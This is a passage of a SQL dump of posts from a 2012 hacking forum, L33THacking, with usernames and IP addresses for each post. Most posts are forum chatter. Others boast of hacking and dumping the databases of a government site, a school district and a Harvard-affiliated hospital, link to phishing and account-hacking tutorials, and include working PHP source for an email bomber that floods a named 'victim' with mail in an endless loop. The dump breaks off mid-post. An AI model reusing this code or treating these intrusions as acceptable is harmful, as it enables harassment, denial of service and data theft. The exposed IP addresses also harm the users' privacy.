'a5c9cef3382888df95cace37269155a5', '0', '0'); INSERT INTO mybb_posts VALUES('3429', '674', '3412', '24', 'RE: Oh NO! Learn how to destroy your hard drive completely', '0', '205', 'mothered', '1349414607', 'This Is simply great.\r\n\r\nWell done mate, very well documented and elaborated.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '1535aca8fa7332e794fd9e321f0e719f', '0', '0'); INSERT INTO mybb_posts VALUES('3430', '238', '1021', '56', 'RE: Ban the user above you', '0', '199', 'Anonymous™', '1349419414', 'Banned for not having 100 posts.', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'f96dbc13948e329d556415599dd41eee', '0', '0'); INSERT INTO mybb_posts VALUES('3431', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1349419573', 'http://www.youtube.com/watch?v=FerfhDnaNrI&feature=g-all-u', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'c4ed368f3010e01ef94774fa124e746b', '0', '0'); INSERT INTO mybb_posts VALUES('3432', '253', '1106', '56', 'RE: Count to 200', '0', '100', '??zg???g????61', '1349433469', '46. I got an even number :P', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '4b07d8ea74334e68e0b23e215fa5a13a', '0', '0'); INSERT INTO mybb_posts VALUES('3433', '238', '1021', '56', 'RE: Ban the user above you', '0', '100', '??zg???g????61', '1349433512', 'Banned for not having 25 posts.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '2f9603af5e291ac00b385b0ec8f7073a', '0', '0'); INSERT INTO mybb_posts VALUES('3434', '238', '1021', '56', 'RE: Ban the user above you', '0', '199', 'Anonymous™', '1349434288', 'Banned for not having 10 rep.', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '60d83ea9ad4eb683f9647d87e6d96bec', '0', '0'); INSERT INTO mybb_posts VALUES('3435', '253', '1106', '56', 'RE: Count to 200', '0', '199', 'Anonymous™', '1349434399', '47. http://www.youtube.com/watch?v=O87Vsr_1afI&feature=g-vrec', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '2c105150008d751175ae1b210c72229b', '0', '0'); INSERT INTO mybb_posts VALUES('3436', '676', '3427', '12', 'RE: Cracking Tuts/Reverse Enginnering', '0', '199', 'Anonymous™', '1349434673', 'Thanks for sharing Mothered.\nI recommend that you run this in Sandboxie.', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '7e07569e17e086d9fdc7f29cffd8656a', '0', '0'); INSERT INTO mybb_posts VALUES('3437', '238', '1021', '56', 'RE: Ban the user above you', '0', '100', '??zg???g????61', '1349436510', 'Banned for not aligning your signature in the center.', '70.192.14.101', '1186991717', '1', '0', '0', '0', '1', '849f969c68bfd53cf104d472d29cbf21', '0', '0'); INSERT INTO mybb_posts VALUES('3438', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1349436624', 'Granted. But t3h jok3r got brain washed and is now stupid :p\n\n\nI wish I had an awesome life. (Big house, nice car, sexy wife, etc ) :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8e2f3992cf6c07f9add8250aa07d25a8', '0', '0'); INSERT INTO mybb_posts VALUES('3439', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1349436664', 'Thanks for that Apathy. I\'ll see how it goes.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2879a2b21847a7e227ff1be4dbee599c', '0', '0'); INSERT INTO mybb_posts VALUES('3440', '654', '3226', '9', 'RE: Make money typing captchas', '0', '82', 'iTzIpod', '1349436706', 'I\'m guessing that too then. Oh well. Guess that explains why I lost some posts before.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '580949f9149076cddc942e7e3199b53f', '0', '0'); INSERT INTO mybb_posts VALUES('3441', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1349436740', 'http://l33thacking.net/thread-253.html \n\nLool I don\'t know why I copied and pasted this..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6f91c5ce82c37a694d1d8c94f71883b3', '0', '0'); INSERT INTO mybb_posts VALUES('3442', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1349436775', 'Banned for no reason at all.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd135715dac0bbf75a0eaaa5478b74a3d', '0', '0'); INSERT INTO mybb_posts VALUES('3443', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349436808', '48. Lik an iPod.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4f0581a3c16949feea8b3d96bc1524a0', '0', '0'); INSERT INTO mybb_posts VALUES('3444', '670', '3408', '16', 'RE: [Guide]How to get free Blizzard games/products.', '0', '62', 'R?????zo?', '1349438713', 'looks convincing, does this works on recently made accounts (dutch ones)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '75f965f74ea6afbd5b248f6a3199f5f5', '0', '0'); INSERT INTO mybb_posts VALUES('3445', '51', '3252', '11', 'RE: DON\'T USE GOOGLE!!!', '0', '205', 'mothered', '1349441171', '[quote=\'iTzGRONgamer61\' pid=\'3252\' dateline=\'1349284335\']\r\nI have a picture about this ;D here- \r\n\r\n\r\n[img]http://i.imgur.com/lHshj.png[/img]\r\n[/quote]\r\n\r\nThat\'s a great way of showing Google\'s traces on you.\r\n\r\nIt gives everyone a visual.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '7e15eebc8258d99e1d06e2d718f3c7f8', '0', '0'); INSERT INTO mybb_posts VALUES('3446', '678', '0', '29', 'Get Free Domain names & Webhosting Packages e-Book [Written by me!]', '0', '172', 'MistaCode', '1349443882', 'As I was bored and angry when they sent me a unpayed invoice to home? As I was stupid to put my real address & Name there... Well here it is :D\r\n\r\n[color=#FF0000]NOTE:[/color] [color=#FFD700]Please read The Warnings![/color]\r\n\r\nDownload:\r\nhttp://adf.ly/DReIZ\r\n\r\nPassword:\r\nl33thacking', '88.193.83.195', '1489064899', '0', '0', '0', '0', '1', 'f0ce4a6cc78b5a53f3560d41b2ed4372', '0', '0'); INSERT INTO mybb_posts VALUES('3447', '376', '3348', '54', 'RE: ExpressVPN codes', '0', '62', 'R?????zo?', '1349452950', '[quote=\'iTzGRONgamer61\' pid=\'3348\' dateline=\'1349376171\']\r\nAww none of them work ;((\r\n[/quote]\r\n\r\nprobably outdated.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '7058eecc57a4b183ae0806926cb02d19', '0', '0'); INSERT INTO mybb_posts VALUES('5959', '431', '5930', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1350859125', '[quote=\'VirtualLegend\' pid=\'5930\' dateline=\'1350848314\']\r\nCan you make me a userbar for my upcoming group Marketers\r\nSize: Idk the size of a Userbar\r\nColour Scheme: Green\r\nRender/Image: Dollar image\r\nText: Marketers\r\nAnything else: Suprise me \r\n\r\nContact me on skype when ur done of when ur stuck\r\n[/quote]\r\n\r\nhad no idea what to make\r\nSo I made it like this:\r\n\r\n[img]http://i.imgur.com/ifvO7.gif[/img]\r\n\r\nHope you like it, pm\'ed you on skype too.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '91c900448a49552bdface25741dbfb97', '0', '0'); INSERT INTO mybb_posts VALUES('3449', '679', '0', '4', 'flamingworm here!', '0', '222', 'Exposé', '1349462521', 'Yoo what\'s up guys...flamingworm here. I\'m from a couple of forums across the interwebzz.. I got a funny pm from someone named lily on AF and was like mmk..Idk how active ill be but yeh :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '63170ac971b0813c97bbec1fe8efc9a3', '0', '0'); INSERT INTO mybb_posts VALUES('3450', '679', '3449', '4', 'RE: flamingworm here!', '0', '1', 't3h jok3r', '1349462885', 'Welcome to L33THacking.net, hope you like our website and correct if me I\'m wrong but you are from ubers and HF right?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '67fd2fab35fd7519fad907d4d068e14a', '0', '0'); INSERT INTO mybb_posts VALUES('3451', '679', '3449', '4', 'RE: flamingworm here!', '0', '222', 'Exposé', '1349462948', 'Nop...:cool:...i\'m flamingworm from l33thacking :D', '74.76.76.132', '1246514308', '0', '0', '1', '1349463083', '1', '2204418c1d00e48146884ee0309783e9', '0', '1349463083'); INSERT INTO mybb_posts VALUES('3452', '253', '1106', '56', 'RE: Count to 200', '0', '222', 'Exposé', '1349463021', '49. Omonomnom I\'m new here!', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '1897a5d7bdd73decdbb0604ddbfda97e', '0', '0'); INSERT INTO mybb_posts VALUES('3453', '679', '3449', '4', 'RE: flamingworm here!', '0', '1', 't3h jok3r', '1349463126', 'Damn I thought I was right :\'(', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '624bc91df8ed1919408cd0cc7eb6443a', '0', '0'); INSERT INTO mybb_posts VALUES('3454', '679', '3449', '4', 'RE: flamingworm here!', '0', '222', 'Exposé', '1349463203', 'Haha ok...and im not a big hacker...but more of a social engineer and programmer + gfx guy. So hopefully I can be active a little bit', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '75af78949480683164986b086c226b05', '0', '0'); INSERT INTO mybb_posts VALUES('3455', '253', '1106', '56', 'RE: Count to 200', '0', '62', 'R?????zo?', '1349463213', '50. one day I will get to this age :/', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9b88552b843777478dda58881f22d729', '0', '0'); INSERT INTO mybb_posts VALUES('3456', '679', '3449', '4', 'RE: flamingworm here!', '0', '1', 't3h jok3r', '1349463282', 'That\'s cool what coding languages you [s]speak[/s] know?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '1f1c3d2ee036a4811a7ae5223ed19db4', '0', '0'); INSERT INTO mybb_posts VALUES('3457', '680', '0', '35', 'Some of my works...', '0', '222', 'Exposé', '1349463351', 'Some logo\'s that I have made and other stuff....\n\nI know they are simple but it is what I like doing :D\n\n[img]http://i.imgur.com/j3BCN.png[/img]\n\n[img]http://envisi0n.com/images/devilos/logo.png[/img]\n\n[img]http://i.imgur.com/g7Kzm.png[/img]\n\n[img]http://i.imgur.com/DFEVA.png[/img]\n\nUserbars...\n\n[img]http://i.imgur.com/CBCpT.png[/img]\n\n[img]http://i.imgur.com/IfWOV.png[/img]\n\n[img]http://i.imgur.com/DoM4v.png[/img]', '74.76.76.132', '1246514308', '0', '0', '222', '1350332658', '1', 'ed40cafa84cb0038d89e692e3d50ddab', '0', '1350332658'); INSERT INTO mybb_posts VALUES('4789', '883', '4784', '7', 'RE: Congratz virtual', '0', '222', 'Exposé', '1350333180', 'Everyone gettin Supermod but me.....:rage:', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '4a4450c395cad05848d591d6150cd3a7', '0', '0'); INSERT INTO mybb_posts VALUES('3458', '679', '3449', '4', 'RE: flamingworm here!', '0', '222', 'Exposé', '1349463471', 'I know vb.net mostly, a little java, html, php, and css. :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '3bc8a5c654fd16e9f541eebcd0e7c607', '0', '0'); INSERT INTO mybb_posts VALUES('3459', '680', '3457', '35', 'RE: Some of my works...', '0', '1', 't3h jok3r', '1349463515', 'Nice work. I like the font you used on the Global Mod userbar.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f2b96f55319eba775e989538ebabde76', '0', '0'); INSERT INTO mybb_posts VALUES('3460', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '222', 'Exposé', '1349463880', 'Sounds like someone is ragin.....this is not good :(', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'f15d208e8968e08f6907e5597ec8bb02', '0', '0'); INSERT INTO mybb_posts VALUES('3461', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '222', 'Exposé', '1349464059', 'I had no idea there was even a l33thackers.com lol....', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'fc97ed48bd907b6e16a55a468d8178ea', '0', '0'); INSERT INTO mybb_posts VALUES('3462', '505', '2523', '53', 'RE: Complete Java Guide', '0', '222', 'Exposé', '1349464158', 'Thanks for this guide...I\'m just learning java so it will be good :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '40fcdf2a38e1f90ea89c0a0e31984662', '0', '0'); INSERT INTO mybb_posts VALUES('3463', '238', '1021', '56', 'RE: Ban the user above you', '0', '222', 'Exposé', '1349464221', 'Banned for starting this gay thread....:P jk jk jk :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '2e044afcf4a408a7fb43329c02766704', '0', '0'); INSERT INTO mybb_posts VALUES('3464', '680', '3457', '35', 'RE: Some of my works...', '0', '222', 'Exposé', '1349464561', 'Thanks :D....I will upload more when I do them :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '1828ceae9f9ab3a5a8245615c22a04d8', '0', '0'); INSERT INTO mybb_posts VALUES('3465', '43', '105', '7', 'RE: How did you find us?', '0', '222', 'Exposé', '1349464807', 'Someone sent me a pm saying I should join the site :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '953acd3e24eb43c508ff7f72052483ac', '0', '0'); INSERT INTO mybb_posts VALUES('3466', '681', '0', '49', 'Chatbox....', '0', '222', 'Exposé', '1349464870', 'You guys ever think to add a chatbox...Idk might be nice :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '717f041c6ad152a2b6944396fc47a28f', '0', '0'); INSERT INTO mybb_posts VALUES('3467', '681', '3466', '49', 'RE: Chatbox....', '0', '82', 'iTzIpod', '1349465103', 'They already made a thread that was stickied about Chatboxes. \n\nRight here.\nhttp://l33thacking.net/thread-119.html', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2e33747a7be3a49636e5dc4808329675', '0', '0'); INSERT INTO mybb_posts VALUES('3468', '643', '3116', '7', 'RE: L33thakcers.com members here?', '0', '219', 'kaitlin', '1349465176', 'Hello yeah it\'s me eg Kaitlin AK from Ubers <----- Ak evil child', '94.0.65.178', '1577075122', '0', '0', '0', '0', '1', '63cb5bcc1f3992198c5002be3346c113', '0', '0'); INSERT INTO mybb_posts VALUES('3469', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1349465237', '51 is the next number.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '092fc88b60781362ab96cf2c6af0b168', '0', '0'); INSERT INTO mybb_posts VALUES('3470', '679', '3449', '4', 'RE: flamingworm here!', '0', '82', 'iTzIpod', '1349465283', 'Welcome to LH bro! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '79b69809720198443cba32c3e1505032', '0', '0'); INSERT INTO mybb_posts VALUES('3471', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '222', 'Exposé', '1349465296', 'Maybe if you had other text or something in the middle it would be fine, but as users said above empty space is never good. So either make it smaller or add something to it..', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '274ba7cf036be85e7ed906adb0102cf8', '0', '0'); INSERT INTO mybb_posts VALUES('3472', '662', '3306', '7', 'RE: Is this how you treat me?', '0', '82', 'iTzIpod', '1349465321', 'I think he left. Hope he doesn\'t come back. Unless he makes that $$ Contest', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7088964e51801c8715ad8253eaa2b958', '0', '0'); INSERT INTO mybb_posts VALUES('3473', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1349465352', ':o Banned for having 2 emotes.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c9288ee28d39f43ffff8a14af892ca5f', '0', '0'); INSERT INTO mybb_posts VALUES('3474', '680', '3457', '35', 'RE: Some of my works...', '0', '82', 'iTzIpod', '1349465416', 'They all look really good. :D You\'re really good.\n\n\n@t3h jok3r, it\'s Kremlin Bolshevik (Font) Same one we all use.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a6b8d0815492522502ba72d3fe68fb14', '0', '0'); INSERT INTO mybb_posts VALUES('3475', '43', '105', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1349465451', 'Welcome to the forum everyone.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1373374f9c53d84f550a476a6ae16dec', '0', '0'); INSERT INTO mybb_posts VALUES('3476', '679', '3449', '4', 'RE: flamingworm here!', '0', '222', 'Exposé', '1349465486', 'Thanks...and is SE content allowed on LH? I\'m an experienced SE\'r and I can release tons of unique methods....', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '6828a712c25445f1ec04993098c985e6', '0', '0'); INSERT INTO mybb_posts VALUES('3477', '594', '2868', '64', 'RE: Noobroom (Online Movie Streaming Site)', '0', '82', 'iTzIpod', '1349465526', 'Should I sticky this thread @t3h jok3r?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'af8a8834ded3be0d51cce9ec03197a93', '0', '0'); INSERT INTO mybb_posts VALUES('3478', '682', '0', '49', 'Hmm', '0', '219', 'kaitlin', '1349465888', 'Ok im going to be very open minded.\r\n\r\nI have only just joined this forum and i dont like the layout or theme.\r\nAlso from looking around i dont really see no hacking threads nor do i see much tools extra.\r\n\r\nAll im seeing is a play ground TBH so whats going to be added i know forums new i know the admin.\r\n\r\nIm just saying i dont like the playground', '94.0.65.178', '1577075122', '0', '0', '0', '0', '1', '1465ed76b2035c85e2d2a70dd1eb793d', '0', '0'); INSERT INTO mybb_posts VALUES('3479', '682', '3478', '49', 'RE: Hmm', '0', '1', 't3h jok3r', '1349469532', 'Thanks for the feedback. L33THacking is a new forum, you can\'t expect us to have HQ and legit 10,000 threads under 2 months. We are building and when it comes to \"no hacking\" threads, we have 37 tutorials and 31 programs in the \"tools & programs\" section. The best is not always for free, some upgraded members stay active in the VIP section and if you are active and help the community then you can join the Unique group. In the unique group, there\'s like 1-4 new threads everyday and they either are tutorials or program giveaway.\n\nWebsites such as HF should be considered playground because they don\'t have much BH discussions unlike L33THacking, we have phishing forums, PIDs, Movie Rips and more. \n\nCould you please elaborate what you mean by \"playground\"?', '72.231.24.165', '1223104677', '1', '0', '1', '1349469662', '1', '1c9fc0d257f85c5df310cefac4a94f34', '0', '1349469662'); INSERT INTO mybb_posts VALUES('3480', '594', '2868', '64', 'RE: Noobroom (Online Movie Streaming Site)', '0', '1', 't3h jok3r', '1349469741', 'Honestly I don\'t know if this should be stickied or not but just do it because this site contains all the movie links.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e297d69b96534099fcda6a628218257f', '0', '0'); INSERT INTO mybb_posts VALUES('3481', '680', '3474', '35', 'RE: Some of my works...', '0', '1', 't3h jok3r', '1349470342', '[quote=\'iTzIpod\' pid=\'3474\' dateline=\'1349465416\']\r\nThey all look really good. :D You\'re really good.\r\n\r\n\r\n@t3h jok3r, it\'s Kremlin Bolshevik (Font) Same one we all use.\r\n[/quote]\r\n\r\nLol The letter \"M\" looked different.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2233e83b89a6fbe208e98a3267e10808', '0', '0'); INSERT INTO mybb_posts VALUES('3482', '679', '3449', '4', 'RE: flamingworm here!', '0', '82', 'iTzIpod', '1349472565', 'Yes it is. We have a SEing Section in the Hacking Tab', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '43e555d143b6a46a01ba2612f61de713', '0', '0'); INSERT INTO mybb_posts VALUES('3505', '685', '0', '13', '[HACKED] http://www.mahrukat.gov.sy/ database dump', '0', '223', 'StarZ', '1349474733', 'I downloaded BackTrack 5 R2 and had a little fun, enjoy. And if you\'re wondering why it says \'Areses\', well that\'s the name I was using on HackForums so I don\'t get banned again. :3\r\n\r\nDump: http://pastebin.com/qUqd40HZ', '174.127.99.156', '-1367383140', '0', '0', '0', '0', '1', 'bdc278c9e677e20f1cd53c515f186e73', '0', '0'); INSERT INTO mybb_posts VALUES('3484', '594', '2868', '64', 'RE: Noobroom (Online Movie Streaming Site)', '0', '82', 'iTzIpod', '1349472627', 'Can you sticky this for me then?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '995c595cb88860368c72003267658e3f', '0', '0'); INSERT INTO mybb_posts VALUES('3485', '238', '1021', '56', 'RE: Ban the user above you', '0', '1', 't3h jok3r', '1349472665', 'Banned because I\'m sad today', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '108f8337c3e2acfff4277ce14128a14e', '0', '0'); INSERT INTO mybb_posts VALUES('3486', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1349472715', '/me tells Ipod to to to to\n\n[spoiler]\nMessage me I\'m bored\n[/spoiler]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6af9484eea7d9c7ed9754bc08f3abe33', '0', '0'); INSERT INTO mybb_posts VALUES('3487', '682', '3478', '49', 'RE: Hmm', '0', '82', 'iTzIpod', '1349472758', 'By playground, I\'m guessing he means like we just post. Instead of posting threads related to hacking.\n\n\nWe get most of our posts from the Forum Games section. But we can\'t do anything about that..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f243fa8ad91a553a9ece866b9eccdfa4', '0', '0'); INSERT INTO mybb_posts VALUES('3488', '682', '3478', '49', 'RE: Hmm', '0', '1', 't3h jok3r', '1349472817', 'It\'s a she, I think she is the first female on LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3c3cda3422555e8cc8362e8cd4ea74a5', '0', '0'); INSERT INTO mybb_posts VALUES('3489', '683', '0', '61', '[Request] Twitter Bot?', '0', '82', 'iTzIpod', '1349472888', 'Does anyone have a confirmed working Twitter bot?\r\n\r\nI need a Twitter Follower/Unfollower bot.\r\nJust so that I can get a couple followers more than someone I know.\r\n\r\n\r\nThanks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9e3abeb9d99b0eb44e0b2389aede982c', '0', '0'); INSERT INTO mybb_posts VALUES('3490', '682', '3478', '49', 'RE: Hmm', '0', '82', 'iTzIpod', '1349472952', 'Oh well. \n\n\nAll I could say is Welcome to L33tHacking.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4fd073b0f3c8b43aad9a5b040046462f', '0', '0'); INSERT INTO mybb_posts VALUES('3491', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1349472991', 'Banned because I\'m pissed off today.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ff91a4d0893756753b2e94f51731edb2', '0', '0'); INSERT INTO mybb_posts VALUES('3492', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1349473021', '/me is pissed off today.\nAnd tells t3h jok3r to go on Skype. Also, I gotta go now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '44858d6a42b5472954190977ef2e497b', '0', '0'); INSERT INTO mybb_posts VALUES('3493', '673', '3423', '29', 'RE: The only allowed \"how to deep web\" tutorial here.', '0', '5', 'Timmy', '1349473036', '[quote=\'Apathy\' pid=\'3423\' dateline=\'1349410414\']\r\nA nice tutorial. Thanks for the share. :)\r\n[/quote]\r\n\r\nDid yo give this a try?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '5f47df7bcf331f8795b65710baef16cd', '0', '0'); INSERT INTO mybb_posts VALUES('3494', '673', '3410', '29', 'RE: The only allowed \"how to deep web\" tutorial here.', '0', '203', 'NeonLights', '1349473059', 'WOW THIS IS FUCKING HARDCORE SHIT MAN! D:', '67.68.75.160', '1128549280', '1', '0', '0', '0', '1', 'dba0941ab205fbef2f0a2484c7882c05', '0', '0'); INSERT INTO mybb_posts VALUES('3495', '190', '665', '56', 'RE: Copy and paste game', '0', '5', 'Timmy', '1349473072', 'https://www.facebook.com/pages/create.php?ref_type=sitefooter', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4b1a77d4bf98a1d996a496bffbee7e27', '0', '0'); INSERT INTO mybb_posts VALUES('3496', '137', '354', '13', 'RE: [TuT] How to exploit a vulnerable site', '0', '5', 'Timmy', '1349473282', 'Thanks it worked. Why does my PC detect the deface builder as a threat but virustotal doesn\'t detect anything?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a4bbad1a310afdf7c8ce65f80fd2f871', '0', '0'); INSERT INTO mybb_posts VALUES('3497', '100', '240', '18', 'RE: [tut]Hack any facebook or account that use username ID and forum password', '0', '5', 'Timmy', '1349473419', 'I did this before but failed like Baws.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd5f9b7f92a467a5b09f580ad3311b270', '0', '0'); INSERT INTO mybb_posts VALUES('3499', '77', '2236', '16', 'RE: Disguise your voice over Skype', '0', '12', 'jonas83', '1349473907', '[quote=\'iTzIpod\' pid=\'2236\' dateline=\'1347910574\']\r\nWorks really well.\r\n\r\nThanks for telling me about Clownfish. =]\r\n\r\nGood for SEing via Skype Calling\r\n[/quote]\r\n\r\nBest part is that this has too many features and all are free.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '48bf6a56a39d5728aae19c41e10666ce', '0', '0'); INSERT INTO mybb_posts VALUES('3500', '680', '3457', '35', 'RE: Some of my works...', '0', '12', 'jonas83', '1349473995', 'It\'s lower case and @OP nice work. What program do you use?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '7443af6247134c30df1bf5f98f263959', '0', '0'); INSERT INTO mybb_posts VALUES('3501', '684', '3498', '19', 'RE: Webtools - CF Resolver / Email Spoofer / Ping / Skype Tools & more', '0', '100', '??zg???g????61', '1349474057', 'Nice share thanks for the download ;D', '70.192.15.83', '1186991955', '1', '0', '0', '0', '1', 'fbed3bbd14db94ba0079a4bd065e280d', '0', '0'); INSERT INTO mybb_posts VALUES('3502', '117', '296', '46', 'RE: Facebook Phishin* Website [tut]with pictures', '0', '12', 'jonas83', '1349474161', 'Should i uplad this to public html', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '4faec34ea23b88375a682fc2d7d4b404', '0', '0'); INSERT INTO mybb_posts VALUES('3503', '100', '240', '18', 'RE: [tut]Hack any facebook or account that use username ID and forum password', '0', '100', '??zg???g????61', '1349474238', 'Cool tutorial thanks. I might try this out', '70.192.15.83', '1186991955', '1', '0', '0', '0', '1', 'a35e2854ba3ca5d650cbbec61c405797', '0', '0'); INSERT INTO mybb_posts VALUES('3504', '77', '184', '16', 'RE: Disguise your voice over Skype', '0', '100', '??zg???g????61', '1349474291', 'Awesome but is this for Mac?', '70.192.15.83', '1186991955', '1', '0', '0', '0', '1', '9e27859af4b02e3fa6c1ab7e69b29e45', '0', '0'); INSERT INTO mybb_posts VALUES('3506', '686', '0', '13', '[HACKED] www.piedmont.k12.ca.us database dumped :3', '0', '223', 'StarZ', '1349474767', 'It took me months to successfully hack it. I was a skid at the time when I was attempting to hack it. Now that I\'ve advanced I finally got around to dumping the databases.\r\n\r\nDump: http://pastebin.com/XCErL39k', '174.127.99.156', '-1367383140', '0', '0', '0', '0', '1', '048016b25cdb420d2d227870bb8f2255', '0', '0'); INSERT INTO mybb_posts VALUES('3507', '687', '0', '13', '[HACKED] mclean.harvard.edu', '0', '223', 'StarZ', '1349474800', 'I successfully hacked them and dumped all of their databases, I didn\'t bother trying to login and deface it, though. Maybe someone else will get lucky.\r\n\r\nDump: http://pastebin.com/aZPrnD0x', '174.127.99.156', '-1367383140', '0', '0', '0', '0', '1', '899d5918c90ddf51b405dd05967d4eb1', '0', '0'); INSERT INTO mybb_posts VALUES('3508', '688', '0', '67', '[PHP] Email Bomber Source', '0', '12', 'jonas83', '1349474965', '[code]\r\n?php\r\n$vic = htmlentities($_POST[\'vic\']);\r\n$subject = htmlentities($_POST[\'subj\']);\r\n$message = htmlentities($_POST[\'mes\']);\r\n$from = htmlentities($_POST[\'from\']);\r\n$sub = $_POST[\'sub\'];\r\n$all = \"$vic$subject$message$from\";\r\n$i = 1;\r\nif(!empty($all) && isset($sub)){\r\n do {\r\n mail($vic, $subject, $message, \"From: \".$from);\r\n } while ($i > 0);\r\n} else if (empty($all) && isset($sub)){\r\n echo \'Please enter all fields!\';\r\n}\r\n?>\r\n<form action=\"#\" method=\"POST\">\r\n Victim: <input type=\"text\" name=\"vic\"><br>\r\n Subject: <input type=\"text\" name=\"subj\"><br>\r\n Message: <input type=\"text\" name=\"mes\"><br>\r\n From: <input type=\"text\" name=\"from\"><br>\r\n <input type=\"submit\" name=\"sub\" value=\"Bomb!\">\r\n</form> \r\n[/code]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '023973c5087e1de05848490cd00a446b', '0', '0'); INSERT INTO mybb_posts VALUES('3509', '77', '184', '16', 'RE: Disguise your voice over Skype', '0', '12', 'jonas83', '1349475101', 'I think it supports Mac but give it a try.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '8d0d9a58237d8684d00b413965952a82', '0', '0'); INSERT INTO mybb_posts VALUES('3510', '63', '149', '23', 'RE: [Guide] - Keylogger Information & Removal - [Guide]', '0', '12', 'jonas83', '1349475145', 'Thanks guys for the appreciation. Good Luck staying safe.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'ba2cf56bc541f48b473be532b769c6c2', '0', '0'); INSERT INTO mybb_posts VALUES('3511', '689', '0', '19', '[Junk]Test', '0', '8', 'spacefish36', '1349475259', 'Junk this thread please. This is a test upon jok3rs request', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'a884f9337ce8b6675d6cfdb51b502140', '0', '0'); INSERT INTO mybb_posts VALUES('3512', '687', '3507', '13', 'RE: [HACKED] mclean.harvard.edu', '0', '9', 'p420', '1349475609', 'Nice hacks. You seem to be a pro web hacker. I bet someone will upload a deface but why don\'t you?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '87ba279d40fe819059ecfec0286fb445', '0', '0'); INSERT INTO mybb_posts VALUES('3513', '688', '3508', '67', 'RE: [PHP] Email Bomber Source', '0', '100', '??zg???g????61', '1349475739', 'As shit thanks bro 